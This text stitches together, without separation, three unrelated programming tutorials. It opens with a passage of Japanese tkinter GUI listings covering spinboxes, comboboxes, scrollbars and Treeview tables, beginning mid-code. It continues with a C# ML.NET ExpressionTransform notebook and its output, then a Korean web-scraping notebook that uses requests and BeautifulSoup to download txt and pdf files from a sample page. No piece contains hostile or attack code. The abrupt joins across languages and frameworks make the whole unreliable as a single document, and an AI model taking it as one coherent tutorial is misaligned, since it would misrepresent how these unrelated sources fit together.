チェックボタン checkbtn = tk.StringVar() checkbtn.set("NO") chk = ttk.Checkbutton(root, variable = checkbtn, text = "Check", onvalue = "OK", offvalue = "NO") chk.pack() root.mainloop() # リスト6.1.10: リスト6.1.9へのボタンの追加 import tkinter as tk from tkinter import ttk root = tk.Tk() # スピンボックス spinbox = tk.StringVar() spinbox.set(0) sp = ttk.Spinbox(root, textvariable = spinbox, from_=-5, to=5, width = 10) sp.pack() # チェックボタン checkbtn = tk.StringVar() checkbtn.set("NO") chk = ttk.Checkbutton(root, variable = checkbtn, text = "Check", onvalue = "OK", offvalue = "NO") chk.pack() # ボタン push_button = tk.Button(root, text = "Push", command = lambda: 
print(sp.get(), checkbtn.get())) push_button.pack() root.mainloop()5 OK6.1.6 辞書型のコンボボックス# リスト6.1.11: 辞書型のコンボボックス import tkinter as tk from tkinter import ttk root = tk.Tk() # コンボボックス combo_dict = {"One": "1", "Two": "2", "Three": "3", "Four": "4", "Five": "5"} cb = ttk.Combobox(root, values = list(combo_dict.keys())) cb.pack() root.mainloop() # リスト6.1.12: リスト6.1.11へのボタンの追加 import tkinter as tk from tkinter import ttk root = tk.Tk() # コンボボックス combo_dict = {"One": "1", "Two": "2", "Three": "3", "Four": "4", "Five": "5"} cb = ttk.Combobox(root, values = list(combo_dict.keys())) cb.pack() # ボタン push_button = tk.Button(root, text = "Push", command = lambda: print(combo_dict[cb.get()])) push_button.pack() root.mainloop()36.1.7 ボタンへの画像の追加# リスト6.1.13: ボタンへの画像の追加 import tkinter as tk root = tk.Tk() # 画像指定 pb_image = tk.PhotoImage(file = "Images/icon.png") # ボタン push_button = tk.Button(root, text = " Push", image = pb_image, compound = tk.LEFT, width = 100, height = 30) push_button.pack(padx = 30, pady = 30) root.mainloop()6.1.8 画像の追加# リスト6.1.14: 画像(キャンバス)の設置 import tkinter as tk root = tk.Tk() # 画像指定 test_image = tk.PhotoImage(file = "Images/test.png") # キャンパス canvas = tk.Canvas(root, width = 250, height = 250) canvas.pack(padx = 10, pady = 10) canvas.create_image(0, 0, image = test_image, anchor = tk.NW) root.mainloop()6.1.9 x軸方向のスクロールバー# リスト6.1.15: x軸方向のスクロールバー import tkinter as tk from tkinter import ttk root = tk.Tk() # フレーム frame = ttk.Frame(root, padding = 5) frame.pack(padx = 5, pady = 5) # テキストボックス txtbox = tk.Text(frame, width = 60, height = 20) # スクロールバー作成 # y軸方向 yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = txtbox.yview) txtbox["yscrollcommand"] = yscroll.set yscroll.pack(side = tk.RIGHT, fill = tk.Y) # x軸横方向 xscroll = tk.Scrollbar(frame, orient = tk.HORIZONTAL, command = txtbox.xview) txtbox["xscrollcommand"] = xscroll.set xscroll.pack(side = tk.BOTTOM, fill = tk.X) # テキストボックスの配置 txtbox.pack() root.mainloop()(補足) 「リスト6.1.15: x軸方向のスクロールバー」について ※ x軸方向のスクロールバーを実際にテストしたい場合は、以下のようにコードを変更してください。 リスト6.1.15のTextウイジットの引数で「wrap = "none"」を追加します。 wrapオプションは、テキストボックス中の長い行の折り返しを設定するためのものです。 折返しなし(wrap = "none")に設定することで、x軸方向のスクロールバーが実際に動作するか確認することができます。 テキストボックスの幅以上の文字列を入力すると、x軸方向のスクロールバーが動作します。 - none: 折り返ししない - char: 文字単位で折り返し - word: 単語単位で折り返し 変更前 txtbox = tk.Text(frame, width = 60, height = 20) ↓ 変更後 txtbox = tk.Text(frame, width = 60, height = 20, wrap = "none")# 補足)リスト6.1.15(wrapオプションの追加): x軸方向のスクロールバー import tkinter as tk from tkinter import ttk root = tk.Tk() # フレーム frame = ttk.Frame(root, padding = 5) frame.pack(padx = 5, pady = 5) # テキストボックス txtbox = tk.Text(frame, width = 60, height = 20, wrap = "none") # スクロールバー作成 # y軸方向 yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = txtbox.yview) txtbox["yscrollcommand"] = yscroll.set yscroll.pack(side = tk.RIGHT, fill = tk.Y) # x軸横方向 xscroll = tk.Scrollbar(frame, orient = tk.HORIZONTAL, command = txtbox.xview) txtbox["xscrollcommand"] = xscroll.set xscroll.pack(side = tk.BOTTOM, fill = tk.X) # テキストボックスの配置 txtbox.pack() root.mainloop()6.1.10 テーブル(表)# リスト6.1.16: 基本的なテーブルの作成 import tkinter as tk from tkinter import ttk root = tk.Tk() # テーブルの作成 tree = ttk.Treeview(root, height = 3) # 列の作成 tree["column"] = (1, 2) tree["show"] = "headings" # ヘッダーの定義 tree.heading(1, text = "Status", anchor = tk.W) tree.heading(2, text = "Name", anchor = tk.W) # 列の定義 tree.column(1, width = 80) tree.column(2, width = 160) # 値の挿入 tree.insert("", "end", values = ("Done", "Item1")) tree.insert("", "end", values = ("Pending", "Item2")) # テーブルの配置 
6.1.10 Tables

# Listing 6.1.16: Creating a basic table
import tkinter as tk
from tkinter import ttk

root = tk.Tk()
# Create the table
tree = ttk.Treeview(root, height = 3)
# Create the columns
tree["column"] = (1, 2)
tree["show"] = "headings"
# Define the headers
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
# Define the columns
tree.column(1, width = 80)
tree.column(2, width = 160)
# Insert values
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
# Place the table
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
root.mainloop()

# Figure 6-17: result of running the code with tree["show"] = "headings" commented out
import tkinter as tk
from tkinter import ttk

root = tk.Tk()
# Create the table
tree = ttk.Treeview(root, height = 3)
# Create the columns
tree["column"] = (1, 2)
#tree["show"] = "headings"
# Define the headers
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
# Define the columns
tree.column(1, width = 80)
tree.column(2, width = 160)
# Insert values
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
# Place the table
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
root.mainloop()

# Listing 6.1.19: Adding a button
import tkinter as tk
from tkinter import ttk

root = tk.Tk()
# Create the table
tree = ttk.Treeview(root, height = 3)
# Create the columns
tree["column"] = (1, 2)
tree["show"] = "headings"
# Define the headers
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
# Define the columns
tree.column(1, width = 80)
tree.column(2, width = 160)
# Insert values
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
# Place the table
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
# Button
push_button = tk.Button(root, text = "Push")
push_button.pack(pady = 10)
root.mainloop()

# Listing 6.1.20: Function that gets the selected table data (the get_vule function)
def get_vule():
    # Get the selected row(s)
    slctItems = tree.selection()
    # Get the value in the second column of the selection
    values = tree.item(slctItems[0])["values"][1]
    # Print the value
    print(values)

# Listing 6.1.22: Code that prints the selected table row
import tkinter as tk
from tkinter import ttk

##### Functions #####
def get_vule():
    slctItems = tree.selection()
    values = tree.item(slctItems[0])["values"][1]
    print(values)

##### GUI #####
root = tk.Tk()
# Table
tree = ttk.Treeview(root, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
# Button
push_button = tk.Button(root, text = "Push", command = get_vule)
push_button.pack(pady = 10)
root.mainloop()

# Listing 6.1.23: Avoiding the error
def get_vule():
    slctItems = tree.selection()
    if not slctItems:
        return
    values = tree.item(slctItems[0])["values"][1]
    print(values)

# Listing 6.1.24: Function that adds data to the table (the insert_vule function)
def insert_vule():
    tree.insert("", "end", values = ("Pending", "Item3"))

# Listing 6.1.25: Code that adds data to the table
import tkinter as tk
from tkinter import ttk

##### Functions #####
def insert_vule():
    tree.insert("", "end", values = ("Pending", "Item3"))

##### GUI #####
root = tk.Tk()
# Create a frame
frame = ttk.Frame(root, padding = 10)
frame.pack()
# Create the table
tree = ttk.Treeview(frame, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
# Create the scroll bar
yscroll = tk.Scrollbar(frame, orient = tk.VERTICAL, command = tree.yview)
yscroll.pack(side = tk.RIGHT, fill = "y")
tree["yscrollcommand"] = yscroll.set
# Place the table
tree.pack(fill = tk.BOTH)
# Button
push_button = tk.Button(root, text = "Push", command = insert_vule)
push_button.pack(pady = 10)
root.mainloop()
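Listings 6.1.20 to 6.1.25 read and insert rows; updating a row in place is not covered, but the same Treeview.item() call used for reading also accepts new values. Below is a minimal sketch (my own addition; mark_done is a hypothetical helper, not one of the numbered listings) that rewrites the Status column of the selected row.

```python
# Sketch (assumption): updating the selected row in place
import tkinter as tk
from tkinter import ttk

def mark_done():
    slctItems = tree.selection()
    if not slctItems:                         # same guard as Listing 6.1.23
        return
    iid = slctItems[0]
    name = tree.item(iid)["values"][1]        # keep the Name column
    tree.item(iid, values = ("Done", name))   # overwrite the Status column in place

root = tk.Tk()
tree = ttk.Treeview(root, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
tk.Button(root, text = "Mark done", command = mark_done).pack(pady = 10)
root.mainloop()
```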
# Listing 6.1.26: Function that deletes the selected table data (the del_vule function)
def del_vule():
    # Get the selected item(s)
    slctItems = tree.selection()
    # Delete them (unpack so every selected row is removed)
    tree.delete(*slctItems)

# Implementing Listing 6.1.26
import tkinter as tk
from tkinter import ttk

##### Functions #####
def del_vule():
    # Get the selected item(s)
    slctItems = tree.selection()
    # Delete them
    tree.delete(*slctItems)

##### GUI #####
root = tk.Tk()
# Table
tree = ttk.Treeview(root, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
# Button
push_button = tk.Button(root, text = "Push", command = del_vule)
push_button.pack(pady = 10)
root.mainloop()

# Listing 6.1.27: Function that deletes all data in the table (the alldel_vule function)
def alldel_vule():
    for child in tree.get_children():
        tree.delete(child)

# Implementing Listing 6.1.27
import tkinter as tk
from tkinter import ttk

##### Functions #####
def alldel_vule():
    for child in tree.get_children():
        tree.delete(child)

##### GUI #####
root = tk.Tk()
# Table
tree = ttk.Treeview(root, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
# Button
push_button = tk.Button(root, text = "Push", command = alldel_vule)
push_button.pack(pady = 10)
root.mainloop()
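As a closing example that ties the appendix together (my own sketch, not one of the numbered listings), the askokcancel box from 6.1.3 can guard the delete-all function from Listing 6.1.27 so the table is only cleared after the user confirms.

```python
# Sketch (assumption): confirm with askokcancel before deleting every row
import tkinter as tk
from tkinter import ttk, messagebox

def alldel_vule():
    # askokcancel returns True only if the user presses OK
    if not messagebox.askokcancel("Confirm", "Delete all rows?"):
        return
    for child in tree.get_children():
        tree.delete(child)

root = tk.Tk()
tree = ttk.Treeview(root, height = 3)
tree["column"] = (1, 2)
tree["show"] = "headings"
tree.heading(1, text = "Status", anchor = tk.W)
tree.heading(2, text = "Name", anchor = tk.W)
tree.column(1, width = 80)
tree.column(2, width = 160)
tree.insert("", "end", values = ("Done", "Item1"))
tree.insert("", "end", values = ("Pending", "Item2"))
tree.pack(padx = 10, pady = 10, fill = tk.BOTH)
tk.Button(root, text = "Clear", command = alldel_vule).pack(pady = 10)
root.mainloop()
```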
ML.NET - ExpressionTransform

[![Linkedin Badge](https://img.shields.io/badge/-LinkedIn-blue?style=flat-square&logo=Linkedin&logoColor=white&link=https://www.linkedin.com/in/davi-ramos/)](https://www.linkedin.com/in/davi-ramos/) [![Twitter Badge](https://img.shields.io/badge/-Twitter-1DA1F2?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/Daviinfo/)](https://twitter.com/Daviinfo/)

// ML.NET NuGet package installation
#r "nuget:Microsoft.ML"

Using C# classes

using System;
using System.Collections.Generic;
using Microsoft.ML;
using Microsoft.ML.Data;

Declare data classes for the input data and predictions

public class SalaryInput
{
    public float YearsExperience;
    public bool IsManager;
    public string Title;
    public int NumberOfTeamsManaged;
}

public class ExpressionOutput
{
    public int TeamsManagedOutput { get; set; }
    public float SquareRootOutput { get; set; }
    public string ToLowerOutput { get; set; }
}

Evaluate

var context = new MLContext();

var inputData = new List<SalaryInput>
{
    new SalaryInput { IsManager = false, YearsExperience = 1f, Title = "Developer" },
    new SalaryInput { IsManager = true, YearsExperience = 9f, Title = "Director", NumberOfTeamsManaged = 2 },
    new SalaryInput { IsManager = false, YearsExperience = 4f, Title = "Analyst" }
};

var data = context.Data.LoadFromEnumerable(inputData);

var expressions = context.Transforms.Expression("SquareRootOutput", "(x) => sqrt(x)", "YearsExperience")
    .Append(context.Transforms.Expression("TeamsManagedOutput", "(x, y) => x ? y : 0",
        nameof(SalaryInput.IsManager), nameof(SalaryInput.NumberOfTeamsManaged)))
    .Append(context.Transforms.Expression("ToLowerOutput", "(x) => lower(x)", nameof(SalaryInput.Title)));

var expressionsTransformed = expressions.Fit(data).Transform(data);
var expressionsData = context.Data.CreateEnumerable<ExpressionOutput>(expressionsTransformed, reuseRowObject: false);

foreach (var expression in expressionsData)
{
    Console.WriteLine($"Square Root - {expression.SquareRootOutput}");
    Console.WriteLine($"Teams Managed - {expression.TeamsManagedOutput}");
    Console.WriteLine($"To Lower - {expression.ToLowerOutput}");
    Console.WriteLine(Environment.NewLine);
}
Console.ReadLine();

Output:
Square Root - 1
Teams Managed - 0
To Lower - developer

Square Root - 3
Teams Managed - 2
To Lower - director

Square Root - 2
Teams Managed - 0
To Lower - analyst

Scraping Files from Websites

You need to create a data set that tracks how many companies the SEC suspended between 1999 and 2019. You can find the data at: ```https://www.sec.gov/litigation/suspensions.shtml```

We want to write a scraper that aggregates:
* Date of suspension
* Company name
* Order
* Release (the PDFs in the XX-YYYYY format)

The challenge? The details are actually in the PDFs!

Demo: downloading files from websites

There are ```txt``` and ```pdf``` files on: ```https://sandeepmj.github.io/scrape-example-page/pages.html```

Do the following (see the sketches after the code below):
1. Download all ```txt``` files.
2. Download all ```pdf``` files.
3. Download all the files in one go.

# import libraries
from bs4 import BeautifulSoup  ## scrape info from web pages
import requests  ## get web pages from the server
import time  # we will use its sleep function to pause between requests
from random import randrange  # generate random numbers
# from google.colab import files  ## code for downloading in Google Colab

# url to scrape
url = "https://sandeepmj.github.io/scrape-example-page/pages.html"

Turn the page into soup

## get the url and print it; the raw output is hard to read, so we will prettify it next
page = requests.get(url)
soup = BeautifulSoup(page.content, "html.parser")
print(soup)

Output (truncated): the page's HTML — a "List of Documents" page with a "Documents to Download" list that includes junk "Junk Li tag" items.
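The next step in the demo is to pull the file links out of the soup. Below is a minimal sketch, assuming the downloadable files appear as ordinary <a href> links ending in .txt or .pdf (the page's real markup may differ); txt_links, pdf_links and all_links are my own names.

```python
# Sketch: collect absolute URLs for the .txt and .pdf links (assumes plain <a href> tags)
from urllib.parse import urljoin

links = [a.get("href") for a in soup.find_all("a") if a.get("href")]
txt_links = [urljoin(url, href) for href in links if href.lower().endswith(".txt")]
pdf_links = [urljoin(url, href) for href in links if href.lower().endswith(".pdf")]
all_links = txt_links + pdf_links

print(len(txt_links), "txt files |", len(pdf_links), "pdf files")
```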

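And a sketch of the download loop itself, reusing all_links from the sketch above plus the time and randrange imports loaded earlier; the ./downloads folder is an assumption (in Colab you would additionally call files.download on each saved file).

```python
# Sketch: download every collected file, pausing politely between requests
import os

os.makedirs("downloads", exist_ok=True)      # assumption: save into a local ./downloads folder
for link in all_links:
    filename = os.path.join("downloads", link.split("/")[-1])
    response = requests.get(link)
    with open(filename, "wb") as f:          # binary write works for both txt and pdf content
        f.write(response.content)
    print("saved", filename)
    time.sleep(randrange(3, 7))              # random 3-6 second pause between downloads
```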